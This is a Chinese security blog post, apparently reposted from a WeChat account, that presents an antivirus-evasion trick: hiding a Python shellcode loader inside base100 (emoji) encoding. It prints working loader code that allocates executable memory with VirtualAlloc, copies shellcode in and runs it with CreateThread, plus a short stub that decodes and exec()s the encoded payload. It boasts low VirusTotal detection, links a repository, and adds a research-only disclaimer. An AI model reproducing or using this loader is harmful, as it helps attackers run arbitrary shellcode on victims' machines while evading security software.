封面回复关键词:007
先看代码:
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/6-1686495828.png "[骚思路免杀]emoji免杀")
三行,没错,就这么简单。。
先看一下解码
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/4-1686495831.png "[骚思路免杀]emoji免杀")
一步一步来拆解
先介绍这个base100编码
详细的库在这
base100编码
https://pypi.org/project/pybase100/
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/3-1686495833.png "[骚思路免杀]emoji免杀")
这个库很简单,就两个函数,decode(解密)和encode(加密)
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/9-1686495834.png "[骚思路免杀]emoji免杀")
a='''shellcode = b"你的shellcode(记得反斜杠)"ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64AV = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(AV), ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(AV), 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''en = pybase100.encode(a)print(en.decode())
拿到这段输出的密文,来到这个加载器
import pybase100,ctypescode = '你的密文'exec(pybase100.decode(code).decode())
这个项目是寒假的时候写的,当时的vt是4/70
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/2-1686495836.png "[骚思路免杀]emoji免杀")
现在再查已经面目全非了,不过依然可以过国内三大厂的
![[骚思路免杀]emoji免杀](http://cn-sec.com/wp-content/uploads/2023/06/0-1686495837.png "[骚思路免杀]emoji免杀")
项目更新在:https://github.com/soryecker/base100Bypass/
原文始发于微信公众号(HB网络安全探究实验室):[骚思路免杀]emoji免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论